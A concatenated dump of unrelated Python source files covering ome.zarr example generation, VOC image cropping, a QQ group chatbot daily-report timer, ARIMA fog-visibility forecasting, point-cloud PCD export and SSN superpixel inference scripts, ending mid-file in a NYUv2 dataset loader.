folder contains the following example ome.zarr files - yx: 2d image, data is the nucleus channel of an image from [1] - zyx: 3d volume, data is an EM volume from [2] - cyx: 2d image with channels, image with 3 channels from [1] - tyx: timeseries of 2d images, timeseries of central slice of membrane channel from [3] - tzyx: timeseries of 3d images, timeseries of membrane channel volume from [3] - tcyx: timeseries of images with channel, timeseries of central slice of membrane + nucleus channel from [3] - czyx: 3d volume with channel, single timepoint of membrane and nucleus channel from [3] - tczyx: timeseries of 3d volumes with channel, full data from [3] - flat_yx: same as yx, but using flat chunk storage (dimension_separator=".") instead of nested storage Publications: [1] https://onlinelibrary.wiley.com/doi/full/10.1002/bies.202000257 [2] https://www.sciencedirect.com/science/article/pii/S193131282030620X [3] https://elifesciences.org/articles/57613 """ out_path = os.path.join(output_folder, 'Readme.md') with open(out_path, 'w') as f: f.write(readme) if __name__ == '__main__': parser = argparse.ArgumentParser() parser.add_argument('-o', '--output_root', required=True) parser.add_argument('--version', default="v0.3") args = parser.parse_args() output_folder = os.path.join(args.output_root, args.version) os.makedirs(output_folder, exist_ok=True) create_2d_example(output_folder) create_3d_examples(output_folder) create_4d_examples(output_folder) create_5d_example(output_folder) create_flat_example(output_folder) copy_readme(output_folder, args.version) ```
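A quick way to check the generated examples is to open them again with `elf.io.open_file`, the same helper the script itself uses for reading. This is only a sketch: the `output_root` path is a placeholder for the value passed via `-o`, and no assumption is made about the names of the scale datasets inside the pyramid, they are simply listed.

```python
import os
from elf.io import open_file

output_root = "/path/to/output_root"   # placeholder: the value passed via -o / --output_root
example = os.path.join(output_root, "v0.3", "yx.ome.zarr")  # the 2d example written above

with open_file(example, "r") as f:
    keys = sorted(f.keys())            # multiscale datasets written by write_ome_zarr
    print(keys)
    data = f[keys[0]][:]               # load one scale level and inspect it
    print(data.shape, data.dtype)
```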
{ "source": "aabbcc23/pytorch_FPN_Rnn_windows", "score": 3 }
#### File: aabbcc23/pytorch_FPN_Rnn_windows/imagegeneral.py ```python import cv2 import math import numpy as np import os import random import xml.etree.cElementTree as ET import sys #用于抠图。 counts=0 class GEN_Annotations: def __init__(self,filename): self.root=ET.Element("annotation") child1=ET.SubElement(self.root,"folder") child1.text="VOC2012" child2=ET.SubElement(self.root,"filename") child2.text=filename child22=ET.SubElement(self.root,"path") child22.text=filename child3=ET.SubElement(self.root,"source") child6=ET.SubElement(self.root,"segmented") child6.text="0" child4=ET.SubElement(child3,"annotation") child4.text="PASCAL VOC2012" child5=ET.SubElement(child3,"database") def set_size(self,width,height,channel): size=ET.SubElement(self.root,"size") widthn=ET.SubElement(size,"width") widthn.text=str(width) heightn=ET.SubElement(size,"height") heightn.text=str(height) channeln=ET.SubElement(size,"channel") channeln.text=str(channel) def savefile(self,filename): tree=ET.ElementTree(self.root) tree.write(filename,encoding='utf-8') def add_pic_attr(self,label,x,y,w,h): object=ET.SubElement(self.root,"object") namen=ET.SubElement(object,"name") namen.text=label pos=ET.SubElement(object,"pos") pos.text="Unspecified" truncated=ET.SubElement(object,"truncated") truncated.text="0" difficult=ET.SubElement(object,"difficult") difficult.text="0" bndbox=ET.SubElement(object,"bndbox") xminn=ET.SubElement(bndbox,"xmin") xminn.text=str(int(x)) yminn=ET.SubElement(bndbox,"ymin") yminn.text=str(int(y)) xmaxn=ET.SubElement(bndbox,"xmax") xmaxn.text=str(int(w)) ymaxn=ET.SubElement(bndbox,"ymax") ymaxn.text=str(int(h)) def readxml(path,tags): if os.path.isfile(path) and ".xml" in path: tree=ET.parse(path) root=tree.getroot() filename=root.find('filename').text filename=filename[:-4] for size in root.findall('size'): width=int(size.find('width').text) height=int(size.find('height').text) fp=np.array([]) count=0 for object in root.findall('object'): name=object.find('name').text if name==tags: fp=np.append(fp,count) count=count+1 count=0 choose=random.randint(0,len(fp)-1) for object in root.findall('object'): name=object.find('name').text if count==fp[choose]: bndbox=object.find('bndbox') xmin=int(bndbox.find('xmin').text) ymin=int(bndbox.find('ymin').text) xmax=int(bndbox.find('xmax').text) ymax=int(bndbox.find('ymax').text) p1=[xmin,ymin,1] p2=[xmax,ymax,1] p3=[xmin,ymax,1] p4=[xmax,ymin,1] return p1,p2,p3,p4,tree,width,height count=count+1 def loopxml(path,tags): list=os.listdir(path) files=[[None,[None]]] for i in range(0,len(list)): lpath=path+"/"+list[i] if os.path.isfile(lpath) and ".xml" in lpath: tree=ET.parse(lpath) root=tree.getroot() filename=root.find('filename').text filename=filename[:-4] for size in root.findall('size'): width=size.find('width').text height=size.find('height').text for object in root.findall('object'): name=object.find('name').text for i in range(len(tags)): if tags[i][0]==name: have=name in [x[0] for x in files] count=0; for x in files: if x[0]==name: break count=count+1 if have==True: files[count][1]=np.append(files[count][1],lpath) else: tem_file=[[name,[None]]] tem_file[0][1]=lpath files=np.concatenate((files,tem_file),axis=0) return files def random_op(op,path,filename,tags,saveimageorgtPath): print(path) #image=cv2.imread(path) image=cv2.imdecode(np.fromfile(path),1) #cv2.imshow("test",image) #cv2.waitKey(0) #print(image) rows,cols=image.shape[:2] #print("1",rows,cols) # deltax=random.randint(-int(rows/2),int(rows/2)) # deltay=random.randint(-int(cols/2),int(cols/2)) 
deltax =0# random.randint(-int(rows / 2), int(rows / 2)) deltay =0# random.randint(-int(cols / 2), int(cols / 2)) tp=[[0,0,1]] #print("op",op) op=0 global transform if op==0: M=np.float32([[1,0,deltax],[0,1,deltay]]) shifted=cv2.warpAffine(image,M,(image.shape[1],image.shape[0])) transform=np.concatenate((M,tp)) # elif op==1: # M=cv2.getRotationMatrix2D((cols/2,rows/2),random.randint(-60,60),1) # #print(M) # transform=np.concatenate((M,tp)) # shifted=cv2.warpAffine(image,M,(image.shape[1],image.shape[0])) p1,p2,p3,p4,tree,w,h=readxml(path.replace(".jpg",".xml"),tags) p11=np.dot(transform,p1) p11=p11.tolist() p22=np.dot(transform,p2) p22=p22.tolist() p33=np.dot(transform,p3) p33=p33.tolist() p44=np.dot(transform,p4) p44=p44.tolist() sud=np.array([p11,p22,p33,p44]) xmin=min(sud[:,0]) ymin=min(sud[:,1]) xmax=max(sud[:,0]) ymax=max(sud[:,1]) w=shifted.shape[1] h=shifted.shape[0] #print("2",len(shifted[0]),h) imagesavepath=saveimageorgtPath+"/"+filename+"_"+tags+"_"+str(counts)+"_.jpg" gtsavepath=saveimageorgtPath+"/"+filename+"_"+tags+"_"+str(counts)+"_.xml" kxHeight=int(ymax-ymin) kxWidth=int(xmax-xmin) print(kxHeight,kxWidth) center_x=int(kxWidth/2+xmin) center_y=int(kxHeight/2+ymin) w = 600 h = 600 shifted2 = shifted[center_y-int(h/2):center_y+int(h/2), center_x-int(w/2):center_x+int(w/2)] print(shifted2.shape[:2]) if shifted2.shape[0]>0 and shifted2.shape[1]>0: cv2.imencode('.jpg',shifted2)[1].tofile(imagesavepath) anno=GEN_Annotations(filename) anno.set_size(w,h,3) anno.add_pic_attr(tags,int(300-kxWidth/2),int(300-kxHeight/2),int(300+kxWidth/2),int(300+kxHeight/2)) anno.savefile(gtsavepath) if __name__=='__main__': ImagePaht="/media/nizhengqi/0007912600089656/fpn.pytorch-master/data/VOCdevkit2007/VOC2007_back/VOC2007/JPEGImages" GtPath="/media/nizhengqi/0007912600089656/fpn.pytorch-master/data/VOCdevkit2007/VOC2007_back/VOC2007/JPEGImages" tags=[["xiaochicun",1]] # tags=[["dg",246],["sg",229], # ["jyzzb",157],["jyhsh",274],["jyhtl",298],["jyhyw",287], # ["fzchy",224],["fzcpx",297],["fzcsh",279], # ["fzcxs",294],["bmqk",296],["lslmqk",287], # ["lsqbm",289],["lsqdp",297],["lsqlm",289], # ["lsqxz",232],["lsxs",275],["wtxztc",292], # ["tjbm",296],["tjjs",274],["tjtf",296], # ["tjwl",297],["tjxx",243],["fnsssh",258], # ["bspsh",287],["bsptl",263],["nc",271],["yw",157]] SaveImagePath="/media/nizhengqi/0007912600089656/fpn.pytorch-master/data/VOCdevkit2007/VOC2007_back/VOC2007/new_image_gt" addGtPath="/media/nizhengqi/0007912600089656/fpn.pytorch-master/data/VOCdevkit2007/VOC2007_back/VOC2007/new_image_gt" l_files=loopxml(GtPath,tags) print(l_files) for i in range(len(tags)): for j in range(tags[i][1]): for f in range(len(l_files)): if l_files[f][0]==tags[i][0]: rd=counts#random.randint(0,len(l_files[f][1])-1) if counts>=len(l_files[f][1])-1: print(counts) counts = 0 continue op=random.randint(0,1) imagefull=l_files[f][1][rd].replace(".xml",".jpg") sps=imagefull.split('/') imagename=sps[len(sps)-1].replace(".xml","").replace(".jpg","").replace(".JPG","") #print(imagefull) random_op(op,imagefull,imagename,tags[i][0],SaveImagePath) #print(counts) counts=counts+1 cv2.waitKey(0) ``` #### File: model/nms/nms_gpu.py ```python import torch import numpy as np from lib.model.nms._ext import nms #from c import pdb def nms_gpu(dets, thresh): keep = dets.new(dets.size(0), 1).zero_().int() num_out = dets.new(1).zero_().int() #nms. nms.nms_cuda(keep, dets, num_out, thresh) keep = keep[:num_out[0]] return keep ```
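Stepping back to the cropping script above (`imagegeneral.py`): its `GEN_Annotations` helper can also be driven on its own to write a Pascal-VOC-style annotation file. A minimal sketch follows; the file names, label and box coordinates are illustrative only.

```python
# Build a VOC-style XML for one 600x600 crop containing a single object.
anno = GEN_Annotations("example_crop.jpg")
anno.set_size(600, 600, 3)
# Arguments are (label, xmin, ymin, xmax, ymax), matching the call in random_op.
anno.add_pic_attr("xiaochicun", 250, 250, 350, 350)
anno.savefile("example_crop.xml")
```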
{ "source": "aabbcco/FG", "score": 2 }
#### File: acmsmu/FG/Timer.py
```python
import nonebot
import os
from cn.acmsmu.FG import DailyConclusion
from Utils.JsonUtils import JsonUtils
from Utils.IOUtils import IOUtils


async def handleTimer(timerName, groupId):
    # Load the per-group state, generate the daily report and send it to the group.
    dataDict = IOUtils.deserializeObjFromPkl(os.path.join(os.getcwd(), 'cn', 'acmsmu', 'FG', 'data', groupId, 'var.pkl'))
    flag = dataDict['flag']
    clu = DailyConclusion.DailyConlusion(groupId)
    report = clu.generateReport()
    # print(timerName + ' daily summary:\n' + report)
    await bot.send_group_msg(group_id=int(groupId), message=report)
    # Swap the A/B chat-log files so the next day's messages go into a fresh file.
    if flag:
        dataDict['flag'] = False
        dataDict['file'] = 'chatB.txt'
        IOUtils.serializeObj2Pkl(dataDict, os.path.join(os.getcwd(), 'cn', 'acmsmu', 'FG', 'data', groupId, 'var.pkl'))
        IOUtils.deleteFile(os.path.join(os.getcwd(), 'cn', 'acmsmu', 'FG', 'data', groupId, 'chatA.txt'))
    else:
        dataDict['flag'] = True
        dataDict['file'] = 'chatA.txt'
        IOUtils.serializeObj2Pkl(dataDict, os.path.join(os.getcwd(), 'cn', 'acmsmu', 'FG', 'data', groupId, 'var.pkl'))
        IOUtils.deleteFile(os.path.join(os.getcwd(), 'cn', 'acmsmu', 'FG', 'data', groupId, 'chatB.txt'))


bot = nonebot.get_bot()
configuration = JsonUtils.json2Dict(os.path.join(os.getcwd(), 'cn', 'acmsmu', 'FG', 'data', 'config.json'))
print(configuration)
# Register one cron job per configured group.
groupInfo = configuration['groupInfo']
for each in groupInfo:
    hour = each['beginHour']
    minutes = each['beginMinutes']
    nonebot.scheduler.add_job(handleTimer, 'cron', hour=hour, minute=minutes, args=[each['timer'], each['groupId']])
    print('Timer ' + each['timer'] + ': scheduled job added successfully!')
```
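The scheduler above only starts timers if `config.json` exposes a `groupInfo` list with the fields it reads (`timer`, `groupId`, `beginHour`, `beginMinutes`). A sketch of writing such a file follows; the timer name and group id are placeholder values.

```python
import json
import os

configuration = {
    "groupInfo": [
        {
            "timer": "dailyReportGroupA",   # hypothetical timer name
            "groupId": "123456789",         # hypothetical QQ group id
            "beginHour": 23,                # daily trigger time, 23:30
            "beginMinutes": 30,
        }
    ]
}

path = os.path.join(os.getcwd(), "cn", "acmsmu", "FG", "data", "config.json")
with open(path, "w", encoding="utf-8") as f:
    json.dump(configuration, f, ensure_ascii=False, indent=2)
```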
{ "source": "aabbcco/mathmatics2020", "score": 3 }
#### File: T4/code/probelm4.py
```python
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import matplotlib

plt.rcParams['font.sans-serif'] = ['SimHei']  # so the Chinese figure labels render correctly
plt.rcParams['axes.unicode_minus'] = False    # so minus signs render correctly

df = pd.read_excel("predict_mor.xlsx")
mor = df['MOR_PREDICT']

'''
Plot the series first to check whether it is stationary:
plt.figure(figsize=(10,6))
plt.plot(df.index,mor)
plt.show()
# it does not look stationary
'''

'''
First-order difference
'''
def timestamp(h, m, s, gap, num):
    # Walk `num` steps of `gap` seconds (plus one extra second every other step)
    # from the start time h:m:s and return the resulting wall-clock timestamp.
    for i in range(num):
        s = s+1 if i % 2 == 0 else s
        s += gap
        m += int(s/60)
        h += int(m/60)
        s = s % 60
        m = m % 60
    return "2016-04-14 %s:%s:%s" % (
        str(h) if h >= 10 else '0'+str(h),
        str(m) if m >= 10 else '0'+str(m),
        str(s) if s >= 10 else '0'+str(s),
    )

time = df['date']
mor_d1 = np.diff(mor)
#mor_d2 = np.diff(mor_d1)
#plt.plot(mor)
##plt.title("高速公路MOR估算时序图",fontsize=30)
#plt.xlabel("时间序列",fontsize=25)
#plt.ylabel("MOR(m)")
#plt.show()
# the first-order difference is roughly stationary
'''
plt.figure()
plt.plot(range(len(mor_d1)),mor_d1)
plt.title("一阶差分",fontsize=30)
plt.xlabel("时间序列",fontsize=25)
plt.ylabel("MOR一阶差分值",fontsize=25)
plt.figure()
plt.plot(range(len(mor_d2)),mor_d2)
plt.title("二阶差分",fontsize=30)
plt.xlabel("时间序列",fontsize=25)
plt.ylabel("MOR二阶差分值",fontsize=25)
'''
#from statsmodels.tsa.stattools import adfuller
#adf = adfuller(mor)
#print(adf)
from statsmodels.graphics.tsaplots import plot_acf, plot_pacf
'''
plot_acf(mor_d1)
plt.xlabel("p",fontsize=25)
plt.title("自相关图",fontsize=30)
plot_pacf(mor_d1)
plt.xlabel("q",fontsize=25)
plt.title("偏自相关",fontsize=30)
'''
'''
ADF test result of the raw series:
(-9.482240734386155, 3.845143230413058e-16, 2, 95, {'1%': -3.5011373281819504, '5%': -2.8924800524857854, '10%': -2.5832749307479226}, 522.7009913785289)
The ADF statistic -9.4822 is below all three critical values, so the series can be treated as stationary.
'''
# Fit ARIMA to the raw data (equivalently, ARMA to the first-order difference); ARIMA with d=1 is used here.
train = mor[0:80]
test = mor[80:-1]
from statsmodels.tsa.arima_model import ARIMA
model = ARIMA(train, order=(15, 1, 1))  # p, q come from the (P)ACF plots above; d is the differencing order needed for stationarity
result = model.fit()
'''
Residual check:
resid = result.resid
from statsmodels.graphics.api import qqplot
qqplot(resid,line = 'q',fit = True)
plt.show()
# In the QQ plot the red line is the normal reference; the residual scatter roughly follows it, so the residuals behave like white noise.
'''
plt.figure()
pred = result.predict(start=1, end=len(mor)+200, typ='levels')
x = 100
for i in range(100, len(pred)):
    if pred[i] >= 220:  # first predicted index where MOR reaches 220 m, i.e. the fog has lifted
        x = i
        break
plt.xticks([0, 98], ['公路截图开始时间\n'+time[0], '公路截图结束时间\n2016-04-14 07:39:11'])
plt.plot(range(len(pred)), [220]*len(pred), linestyle='--')
plt.plot(range(len(mor)), mor, c='r')
plt.plot(range(len(pred)), pred, c='g')
plt.title('ARIMA模型预测MOR以及计算估计所得MOR', fontsize=30)
plt.annotate('预测大雾消散时间:\n%s' % timestamp(6, 31, 8, 41, x),
             xy=(x, pred[x]), xycoords='data', xytext=(-100, -100),
             textcoords='offset points', fontsize=20,
             arrowprops=dict(arrowstyle='->', connectionstyle="arc3,rad=.2"))
# Mean relative error of the prediction over the 20 held-out points.
sum_abs = 0
for i in range(79, 99):
    sum_abs += abs(pred[i]-mor[i])/pred[i]
print(sum_abs/20)
plt.tick_params(labelsize=20)
plt.legend(['期望的mor', '计算估计的mor', '模型预测的mor'], fontsize=25)
plt.xlabel('时间序列', fontsize=25)
plt.ylabel('MOR(m)', fontsize=25)
plt.show()
```
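Since `timestamp` is the only piece that maps a prediction index back to wall-clock time, a quick standalone check is useful; the calls below reuse the 06:31:08 start time and 41-second gap used in the annotation above.

```python
# index 0 is the first highway screenshot, index 98 roughly the last one
print(timestamp(6, 31, 8, 41, 0))    # -> 2016-04-14 06:31:08
print(timestamp(6, 31, 8, 41, 98))   # close to the 07:39:11 end tick on the x axis
```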
{ "source": "aabbcco/pointcnn_vkitti3d_tool", "score": 3 }
#### File: aabbcco/pointcnn_vkitti3d_tool/prediction.py ```python import numpy as np import argparse import os color_list = [ '13130240', '32818', '56320', '16711680', '6579300', '13158600', '16711935', '16776960', '8388863', '16763030', '33023', '51455', '16744448' ] def torgb(r, g, b): return (int(r) << 16 | int(g) << 8 | int(b)) def getFiles(path, suffix): return [os.path.join(root, file) for root, dirs, files in os.walk(path) for file in files if file.endswith(suffix)] parser = argparse.ArgumentParser() parser.add_argument('--data', '-d', default='../05', help='data path') parser.add_argument('--label', '-l', default='../results', help='label path') parser.add_argument('--name','-n',required=True,help='name add on pcd file') parser.add_argument('--mode','-m',default='color',help='output pred by color or label') arg = parser.parse_args() filelist = getFiles(arg.label, '.labels') # print(filelist) for fils in filelist: # print(fils) name = fils.split('.labels')[0].split('\\')[-1] #print(name, '\n') data = np.load(os.path.join( arg.data, name + '.npy')) label = np.loadtxt(fils) x = (np.max(data[:, 0])+np.min(data[:, 0]))/2 y = (np.max(data[:, 1])+np.min(data[:, 1]))/2 z = (np.max(data[:, 2])+np.min(data[:, 2]))/2 data[:, 0] -= x data[:, 1] -= y data[:, 2] -= z print("processing ", name, '!!! pointcloud size: ', data.shape[0]) file_orig = os.path.join('../orig_pcd', name + '_'+arg.name + '_orig.pcd') file_label = os.path.join('../label_pcd', name +'_'+ arg.name + '_label.pcd') file_pred = os.path.join('../pred_pcd', name +'_'+ arg.name + '_pred.pcd') if os.path.exists(file_orig): os.remove(file_orig) if os.path.exists(file_label): os.remove(file_label) if os.path.exists(file_pred): os.remove(file_pred) Output_orig = open(file_orig, "a",encoding='utf-8') Output_label = open(file_label, "a",encoding='utf-8') Output_pred = open(file_pred, "a",encoding='utf-8') if arg.mode is 'color': mode = 'rgb' else: mode = 'label' Output_pred.write('# .PCD v0.7 - Point Cloud Data file format\nVERSION 0.7\nFIELDS x y z '+mode+'\nSIZE 4 4 4 4 \nTYPE F F F U\nCOUNT 1 1 1 1') string = '\nWIDTH ' + str(data.shape[0]) Output_pred.write(string) Output_pred.write('\nHEIGHT 1\nVIEWPOINT 0 0 0 1 0 0 0') string = '\nPOINTS ' + str(data.shape[0]) Output_pred.write(string) Output_pred.write('\nDATA ascii') Output_label.write( '# .PCD v0.7 - Point Cloud Data file format\nVERSION 0.7\nFIELDS x y z '+mode+'\nSIZE 4 4 4 4 \nTYPE F F F U\nCOUNT 1 1 1 1') string = '\nWIDTH ' + str(data.shape[0]) Output_label.write(string) Output_label.write('\nHEIGHT 1\nVIEWPOINT 0 0 0 1 0 0 0') string = '\nPOINTS ' + str(data.shape[0]) Output_label.write(string) Output_label.write('\nDATA ascii') Output_orig.write( '# .PCD v0.7 - Point Cloud Data file format\nVERSION 0.7\nFIELDS x y z rgb\nSIZE 4 4 4 4 \nTYPE F F F U\nCOUNT 1 1 1 1') string = '\nWIDTH ' + str(data.shape[0]) Output_orig.write(string) Output_orig.write('\nHEIGHT 1\nVIEWPOINT 0 0 0 1 0 0 0') string = '\nPOINTS ' + str(data.shape[0]) Output_orig.write(string) Output_orig.write('\nDATA ascii') if arg.mode is 'color': for j in range(data.shape[0]): string_xyz = ('\n' + str(data[j, 0]) + ' ' +str(data[j, 1]) + ' ' + str(data[j, 2]) + ' ') string = string_xyz+color_list[int(label[j]-1)] Output_pred.write(string) string = string_xyz+color_list[int(data[j, 6])] Output_label.write(string) string = string_xyz+str(torgb(data[j, 3],data[j, 4], data[j, 5])) Output_orig.write(string) else: for j in range(data.shape[0]): string_xyz = ('\n' + str(data[j, 0]) + ' ' +str(data[j, 1]) + ' ' + 
str(data[j, 2]) + ' ') string = string_xyz+str(int(label[j]-1)) Output_pred.write(string) string = string_xyz+str(int(data[j, 6])) Output_label.write(string) string = string_xyz+str(torgb(data[j, 3],data[j, 4], data[j, 5])) Output_orig.write(string) Output_pred.close() Output_orig.close() Output_label.close() print("all done!") ```
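The helpers at the top of `prediction.py` are easy to sanity-check in isolation: `torgb` packs 8-bit R, G, B values into the single integer that the PCD `rgb` field stores, which is also where the hard-coded `color_list` values come from.

```python
# Typical invocation of the script itself (the -d / -l / -m values are the argparse defaults):
#   python prediction.py -d ../05 -l ../results -n run1 -m color
print(torgb(255, 0, 0))    # 16711680 == 0xFF0000, the red entry in color_list
print(torgb(0, 0, 255))    # 255      == 0x0000FF
print(torgb(200, 100, 0))  # 13132800
```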
{ "source": "aabbcco/ssn-3d-pytorch", "score": 2 }
#### File: aabbcco/ssn-3d-pytorch/eval_on_test_set.py ```python import math import numpy as np import torch from torch.utils.data import DataLoader import os from skimage.color.colorconv import lab2rgb from matplotlib import pyplot as plt from skimage.color import rgb2lab from skimage.segmentation._slic import _enforce_label_connectivity_cython from lib.ssn.ssn import sparse_ssn_iter from lib.dataset import bsds from evaluations import undersegmentation_error, achievable_segmentation_accuracy, compactness, boundary_recall @torch.no_grad() def inference(image, nspix, n_iter, model, fdim=None, color_scale=0.26, pos_scale=2.5, enforce_connectivity=True): """ generate superpixels Args: image: numpy.ndarray An array of shape (h, w, c) nspix: int number of superpixels n_iter: int number of iterations fdim (optional): int feature dimension for supervised setting color_scale: float color channel factor pos_scale: float pixel coordinate factor weight: state_dict pretrained weight enforce_connectivity: bool if True, enforce superpixel connectivity in postprocessing Return: labels: numpy.ndarray An array of shape (h, w) """ # if weight is not None: # from model import SSNModel # model = SSNModel(fdim, nspix, n_iter).to("cuda") # model.load_state_dict(torch.load(weight)) # model.eval() # else: # model = lambda data: sparse_ssn_iter(data, nspix, n_iter) height, width = image.shape[2:] nspix_per_axis = int(math.sqrt(nspix)) pos_scale = pos_scale * max(nspix_per_axis/height, nspix_per_axis/width) coords = torch.stack(torch.meshgrid(torch.arange( height, device="cuda"), torch.arange(width, device="cuda")), 0) coords = coords[None].float() image = image.to("cuda").float() inputs = torch.cat([color_scale*image, pos_scale*coords], 1) _, H, _ = model(inputs) labels = H.reshape(height, width).to("cpu").detach().numpy() if enforce_connectivity: segment_size = height * width / nspix min_size = int(0.06 * segment_size) max_size = int(3.0 * segment_size) labels = _enforce_label_connectivity_cython( labels[None], min_size, max_size)[0] return labels if __name__ == "__main__": import time import argparse import matplotlib.pyplot as plt from skimage.segmentation import mark_boundaries parser = argparse.ArgumentParser() parser.add_argument("--root", type=str, default='../BSR', help="/path/to/val") parser.add_argument("--weight", default=None, type=str, help="/path/to/pretrained_weight") parser.add_argument("--fdim", default=20, type=int, help="embedding dimension") parser.add_argument("--niter", default=10, type=int, help="number of iterations for differentiable SLIC") parser.add_argument("--nspix", default=100, type=int, help="number of superpixels,100 to nspix") parser.add_argument('--dest', '-d', default='results', help='dest folder the image saves') parser.add_argument("--color_scale", default=0.26, type=float) parser.add_argument("--pos_scale", default=2.5, type=float) args = parser.parse_args() weight = args.weight nspix = args.nspix n_iter = args.niter fdim = args.fdim # Dataset did everything for us dataset = bsds.BSDS(args.root, split='val') dataloader = DataLoader(dataset, batch_size=1, shuffle=False) # generate number of spix from 100 to nspix asstep 100 for i in range(100, args.nspix+1, 100): if not os.path.exists(args.dest): os.mkdir(args.dest) if not os.path.exists(os.path.join(args.dest, str(i))): os.mkdir(os.path.join(args.dest, str(i))) if weight is not None: from model import SSNModel model = SSNModel(fdim, i, n_iter).to("cuda") model.load_state_dict(torch.load(weight)) model.eval() else: def 
model(data): return sparse_ssn_iter(data, i, n_iter) # throw every image into the net for data in dataloader: image, label, name = data height, width = image.shape[-2:] label_pred = inference(image, args.nspix, args.niter, model, args.fdim, args.color_scale, args.pos_scale) label = label.argmax(1).reshape(height, width).numpy() np.savetxt(os.path.join(args.dest, str(i), name[0]+'.csv'), label_pred, fmt='%d', delimiter=',') asa = achievable_segmentation_accuracy(label_pred, label) usa = undersegmentation_error(label_pred, label) cptness = compactness(label_pred) BR = boundary_recall(label_pred, label) image = np.squeeze(image.numpy(), axis=0).transpose(1, 2, 0) image = lab2rgb(image) print(name[0], '\tprocessed,asa_{:.4f}_usa{:.4f}_co{:.4f}_BR_{:.4f}'.format( asa, usa, cptness, BR)) plt.imsave(os.path.join(args.dest, str(i), "asa_{:.4f}_usa_{:.4f}_co_{:.4f}_BR_{:.4f}_{}.jpg".format( asa, usa, cptness, BR, name[0])), mark_boundaries(image, label_pred)) ``` #### File: aabbcco/ssn-3d-pytorch/generateassign.py ```python import os import math import numpy as np import torch from torch.utils.data import DataLoader from model import SSNModel from lib.dataset import bsds from lib.ssn.ssn import sparse_ssn_iter from skimage.color import rgb2lab @torch.no_grad() def getQ(image, nspix, n_iter, fdim=None, color_scale=0.26, pos_scale=2.5, weight=None, enforce_connectivity=True): if weight is not None: from model import SSNModel model = SSNModel(fdim, nspix, n_iter).to("cuda") model.load_state_dict(torch.load(weight)) model.eval() else: def model(data): return sparse_ssn_iter(data, nspix, n_iter) height, width = image.shape[:2] nspix_per_axis = int(math.sqrt(nspix)) pos_scale = pos_scale * max(nspix_per_axis/height, nspix_per_axis/width) coords = torch.stack(torch.meshgrid(torch.arange( height, device="cuda"), torch.arange(width, device="cuda")), 0) coords = coords[None].float() image = rgb2lab(image) image = torch.from_numpy(image).permute(2, 0, 1)[None].to("cuda").float() inputs = torch.cat([color_scale*image, pos_scale*coords], 1) Q, H, features = model(inputs) labels = H.reshape(height, width).to("cpu").detach().numpy() return Q, labels, features if __name__ == "__main__": import time import argparse import matplotlib.pyplot as plt from skimage.segmentation import mark_boundaries parser = argparse.ArgumentParser() parser.add_argument( "--image", type=str, default='../BSR/BSDS500/data/images/val/3096.jpg', help="/path/to/image") parser.add_argument("--weight", default=None, type=str, help="/path/to/pretrained_weight") parser.add_argument("--fdim", default=20, type=int, help="embedding dimension") parser.add_argument("--niter", default=10, type=int, help="number of iterations for differentiable SLIC") parser.add_argument("--nspix", default=100, type=int, help="number of superpixels") parser.add_argument("--color_scale", default=0.26, type=float) parser.add_argument("--pos_scale", default=2.5, type=float) args = parser.parse_args() image = plt.imread(args.image) s = time.time() Q, label, features = getQ( image, args.nspix, args.niter, args.fdim, args.color_scale, args.pos_scale, args.weight) print(f"time {time.time() - s}sec") Q = Q.detach().to('cpu').to_dense().numpy().squeeze(0) features = features.detach().to('cpu').numpy().squeeze(0) print(Q.shape) print(label.shape) np.savetxt('Q.csv',Q,delimiter=',') np.savetxt('label.csv',label,delimiter=',') np.savetxt('features.csv',features,delimiter=',') ``` #### File: ssn-3d-pytorch/inferencers/inference-shapenetx.py ```python from torch.utils.data import 
DataLoader import numpy as np import torch import os import sys sys.path.append(os.path.dirname("../")) from lib.dataset.shapenet import shapenet from lib.utils.pointcloud_io import write from models.model_ptnet import PointNet_SSNx from lib.ssn.ssn import soft_slic_pknn @torch.no_grad() def inference(pointcloud, pos_scale=10, weight=None): """generate 3d spix Args: pointcloud (Tensor): Tensor of input pointcloud pos_scale (int, optional): coordinate multpilter. Defaults to 10. weight ([type], optional): model itself. Defaults to None. Returns: [type]: [description] """ if weight is not None: model = weight else: raise Exception('model not loaded') inputs = pos_scale * pointcloud inputs = inputs.to("cuda") Q, H, center, feature = model(inputs) Q = Q.to("cpu").detach().numpy() labels = H.to("cpu").detach().numpy() feature = feature.to("cpu").detach().numpy() center = center.to("cpu").detach().numpy() return Q, labels, center, feature if __name__ == "__main__": import time import argparse import matplotlib.pyplot as plt parser = argparse.ArgumentParser() parser.add_argument("--weight", "-w", default='log/model-shapenet.pth', type=str, help="/path/to/pretrained_weight") parser.add_argument("--fdim", "-d", default=20, type=int, help="embedding dimension") parser.add_argument("--niter", "-n", default=10, type=int, help="number of iterations for differentiable SLIC") parser.add_argument("--nspix", default=50, type=int, help="number of superpixels") parser.add_argument("--pos_scale", "-p", default=10, type=float) parser.add_argument("--folder", "-f", default='log', help="a folder to store result") args = parser.parse_args() if not os.path.exists(args.folder): os.mkdir(args.folder) data = shapenet("../../shapenet_part_seg_hdf5_data", split='val') loader = DataLoader(data, batch_size=1, shuffle=False) model = PointNet_SSNx(args.fdim, args.nspix, args.niter, backend=soft_slic_pknn).to("cuda") model.load_state_dict(torch.load(args.weight)) model.eval() print(model) s = time.time() for i, (pointcloud, label, labell) in enumerate(loader): print(i) _, labels, _, _ = inference(pointcloud, 10, model) pointcloud = pointcloud.squeeze(0).transpose(1, 0).numpy() label = labell.transpose(1, 0).numpy() #spix = spix.squeeze(0).transpose(1, 0).numpy() ptcloud = np.concatenate( (pointcloud, label, label, labels.transpose(1, 0)), axis=-1) write.tobcd(ptcloud, 'xyzrgb', os.path.join(args.folder, '{}.pcd'.format(i))) ``` #### File: lib/dataset/NYUv2.py ```python import os import glob import torch from torch.utils.data import Dataset import numpy as np import scipy.io from skimage.color import rgb2lab import matplotlib.pyplot as plt def convert_label(label): onehot = np.zeros( (1, 50, label.shape[0], label.shape[1])).astype(np.float32) ct = 0 for t in np.unique(label).tolist(): if ct >= 50: break else: onehot[:, ct, :, :] = (label == t) ct = ct + 1 return onehot def convert_spix(label): onehot = np.zeros( (1, 200, label.shape[0], label.shape[1])).astype(np.float32) ct = 0 for t in np.unique(label).tolist(): if ct >= 200: break else: onehot[:, ct, :, :] = (label == t) ct = ct + 1 return onehot class NYUv2(Dataset): def __init__(self, root, split="train", color_transforms=None, geo_transforms=None): assert split in ['train', 'test'] self.data_dir = os.path.join(root, split, 'nyu_images') self.gt_dir = os.path.join(root, split, 'nyu_labels') self.spix_dir = os.path.join(root, split, 'nyu_spixs') self.index = os.listdir(self.data_dir) self.color_transforms = 